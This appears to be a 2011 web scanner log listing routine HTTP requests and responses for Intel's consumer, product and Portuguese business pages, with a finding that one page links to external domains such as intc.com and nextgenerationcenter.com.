...[SNIP]... <li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a> ...[SNIP]... <li><a href="http://twitter.com/JobsatIntel">Follow us on Twitter</a> ...[SNIP]... <li><a href="http://www.facebook.com/DiscoverIntel">Facebook</a> ...[SNIP]... </a> <a id="LHC-investor-relations-menu" href="http://www.intc.com">Investor Relations</a> ...[SNIP]... <span class="item-image-right"><a href="http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/98.html" target="_blank" title="Intel-simply a great place to work"><img src="/jobs/images/homepage/thumbnails/intel-thumb.jpg" height="75" width="100" alt="Intel-simply a great place to work" title="Intel-simply a great place to work" border="0" /> ...[SNIP]... <h3><a href="http://money.cnn.com/magazines/fortune/bestcompanies/2011/snapshots/51.html" target="_blank" title="They're smiling again...">Yes, we're one of the best places to work! ></a> ...[SNIP]... <span class="item-image-right"><a href="http://greenrankings.newsweek.com/companies/view/intel/" target="_blank" title="We're committed to the environment"><img src="/jobs/images/homepage/thumbnails/newsweek-thumb.jpg" height="75" width="100" alt="We're committed to the environment" title="We're committed to the environment" border="0" /> ...[SNIP]... <h3><a href="http://greenrankings.newsweek.com/companies/view/intel/" title="We're committed to the environment">We're committed to the environment ></a> ...[SNIP]... <span class="item-image-right"><a href="http://images.businessweek.com/ss/09/09/0903_places_to_launch_a_career/21.htm" target="_blank" title="Intel named on BusinessWeek.com's Hottest Employers"><img src="/jobs/images/homepage/thumbnails/businessweek-thumb.jpg" height="75" width="100" alt="Intel named on BusinessWeek.com's Hottest Employers" title="Intel named on BusinessWeek.com's Hottest Emp ...[SNIP]... <h3><a href="http://images.businessweek.com/ss/09/09/0903_places_to_launch_a_career/21.htm" target="_blank" title="Intel named on BusinessWeek.com's Hottest Employers">Intel named on BusinessWeek.com's Hottest Employers ></a> ...[SNIP]... <li><a title="Twitter" href="http://www.twitter.com/jobsatintel"><img height="23" width="23" alt="Twitter" src="http://blogs.intel.com/sitewide/pix/icons/icn-twitter-23.gif" /></a> <a href="http://www.twitter.com/jobsatintel" target="_blank" title="Twitter">Twitter</a> ...[SNIP]... <li><a title="Facebook" href="http://www.facebook.com/DiscoverIntel"><img height="23" width="23" alt="Facebook" src="http://blogs.intel.com/sitewide/pix/icons/icn-facebook-23.gif" /></a> <a href="http://www.facebook.com/DiscoverIntel" target="_blank" title="Facebook">Facebook</a> ...[SNIP]... <li><a title="LinkedIn" href="http://www.linkedin.com/company/intel-corporation/careers"><img height="23" width="23" alt="LinkedIn" src="/Assets/Image/thumbnails/icn-linkedin-23.png" /></a> <a href="http://www.linkedin.com/company/intel-corporation/careers" target="_blank" title="LinkedIn">LinkedIn</a> ...[SNIP]... <li><a title="YouTube" href="http://www.youtube.com/user/channelintel#grid/user/267DC6DEE5764F12"><img height="23" width="23" alt="YouTube" src="http://blogs.intel.com//sitewide/pix/icons/icn-youtube-23.gif" /></a> <a href="http://www.youtube.com/user/channelintel#grid/user/267DC6DEE5764F12" target="_blank" title="YouTube">YouTube</a> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]... <br /> <a href="http://www.adobe.com/go/getflashplayer"> <img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" border="0"/> </a> ...[SNIP]...
GET /learn?iid=gg_play+cdz HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Cache-Control: no-cache="Set-Cookie" Content-Type: text/html;charset=utf-8 Content-Language: en Server: IA Web Server Date: Sat, 05 Feb 2011 23:20:07 GMT Content-Length: 24321 Connection: close Set-Cookie: JSESSIONID=GHGCNNbHpttjHghb2WC15nPHQnTFbKPq8JhhwZPTm9gXw6qwZsvw!-280077424; path=/; HttpOnly=
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /learn/?iid=gg_play+cdz HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Cache-Control: no-cache="Set-Cookie" Content-Type: text/html;charset=utf-8 Content-Language: en Server: IA Web Server Date: Sat, 05 Feb 2011 23:20:47 GMT Content-Length: 24633 Connection: close Set-Cookie: JSESSIONID=qScvNNbP1hGdDtwK9LLGGRhbMwc9nFyx1LppvTGK87ScvqBhHjfR!1205360102; path=/; HttpOnly=
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /learn/buying-guides/?iid=subhdr+learn_buyguides HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Cache-Control: no-cache="Set-Cookie" Content-Type: text/html;charset=utf-8 Content-Language: en Server: IA Web Server Date: Sat, 05 Feb 2011 23:20:52 GMT Content-Length: 24668 Connection: close Set-Cookie: JSESSIONID=hPGSNNbT4nmGHpvL3zF8p68gXV2tK8F8fhBKQy1rZy8Y3NTLqsgw!1651646670; path=/; HttpOnly=
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /learn/practical-advice/?iid=gg_play+howto HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Cache-Control: no-cache="Set-Cookie" Content-Type: text/html;charset=utf-8 Content-Language: en Server: IA Web Server Date: Sat, 05 Feb 2011 23:20:47 GMT Content-Length: 29358 Connection: close Set-Cookie: JSESSIONID=GYWFNNbPzghpbTnZMMgF0KMHNPqz2vSvXck1yXWcK7PQgXlqx1Jm!1205360102; path=/; HttpOnly=
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The response contains the following links to other domains:
http://www.intc.com/index.cfm?iid=ftr-BR+invrel
http://www.nextgenerationcenter.com/
Request
GET /portugues/business/index.htm?iid=gg_pt_BR+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33103
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us"> <head> <meta http-equiv=Content-Type content="text/html; charset=UTF-8"> ...[SNIP]... <li><a href="http://www.nextgenerationcenter.com" target="_blank">Next Generation Center: Treinamentos de TI e muito mais</a> ...[SNIP]... <p> <a href="http://www.nextgenerationcenter.com" target="_blank">Next Generation Center</a> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr-BR+invrel">Rela....es com o Investidor</a> ...[SNIP]...
GET /products/chipsets/index.htm?iid=gg_prod-en_US+chipsets HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:24 GMT Content-Length: 31537 Connection: close
<!DOCTYPE html public "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML lang="en-US"> <HEAD> <meta http-equiv=Content-Type content="text/html; charset=utf-8">
GET /products/desktop/index.htm?iid=gg_prod-en_US+desktop HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:26 GMT Content-Length: 28041 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
GET /products/laptop/index.htm?iid=gg_prod-en_US+laptop HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:25 GMT Content-Length: 27531 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
GET /products/motherboard/index.htm?iid=gg_prod-en_US+mb HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
